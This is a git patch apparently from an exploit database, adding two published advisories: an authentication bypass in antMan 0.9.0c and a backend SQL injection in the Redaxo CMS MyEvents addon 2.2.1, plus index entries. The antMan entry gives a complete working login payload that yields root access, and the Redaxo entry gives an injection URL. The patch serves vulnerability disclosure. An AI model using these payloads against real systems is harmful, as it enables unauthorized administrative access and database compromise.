From a2480f5b984ebfe1f0dd74771290f29a517f109f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 8 Mar 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-03-08 2 changes to exploits/shellcodes Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection antMan 0.9.0c - Authentication Bypass --- exploits/java/webapps/44262.txt | 39 +++++++++++++++++++++++++++++++++ exploits/php/webapps/44261.txt | 20 +++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 61 insertions(+) create mode 100644 exploits/java/webapps/44262.txt create mode 100644 exploits/php/webapps/44261.txt diff --git a/exploits/java/webapps/44262.txt b/exploits/java/webapps/44262.txt new file mode 100644 index 000000000..7b09cde20 --- /dev/null +++ b/exploits/java/webapps/44262.txt @@ -0,0 +1,39 @@ +# Exploit Title: antMan <= 0.9.0c Authentication Bypass +# Date: 02-27-2018 +# Software Link: https://www.antsle.com +# Version: <= 0.9.0c +# Tested on: 0.9.0c +# Exploit Author: Joshua Bowser +# Contact: joshua.bowser@codecatoctin.com +# Website: http://www.codecatoctin.com +# Category: web apps + +1. Description + +antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console. + +http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html + + +2. Proof of Concept + +The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Java’s ProcessBuilder class to invoke, as root, a bash script called antsle-auth. + +This script contains two critical defects that allow an attacker to bypass the authentication checks. By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer. + +To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows: + +#------------------------- +POST /login HTTP/1.1 +Host: 10.1.1.7:3000 +[snip] + +username= > &password=%0a +#------------------------- + +You will now be successfully authenticated to antMan as the administrative root user. + + +3. Solution: + +Update to version 0.9.1a \ No newline at end of file diff --git a/exploits/php/webapps/44261.txt b/exploits/php/webapps/44261.txt new file mode 100644 index 000000000..26052318a --- /dev/null +++ b/exploits/php/webapps/44261.txt @@ -0,0 +1,20 @@ +# Exploit Title: Redaxo CMS Addon MyEvents SQL Injection [ Backend ] +# Date: 01.03.2018 +# Exploit Author: h0n1gsp3cht +# Vendor Homepage: http://www.github.com/wende60/myevents +# Version: 2.2.1 (Last Version) +# Tested on: LinuxMint +# More: Login Required +# GET + +############## +Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php +############## + +$myevents_id            =  strip_tags(rex_request('myevents_id', 'string')); + +############### +POC +############### + +http://127.0.0.1/redaxo/index.php?page=myevents/event_add&myevents_id=[SQL] \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 51e510565..ac3e52553 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -38970,3 +38970,5 @@ id,file,description,date,author,type,platform,port 44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80 44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php, 44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple, +44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80 +44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000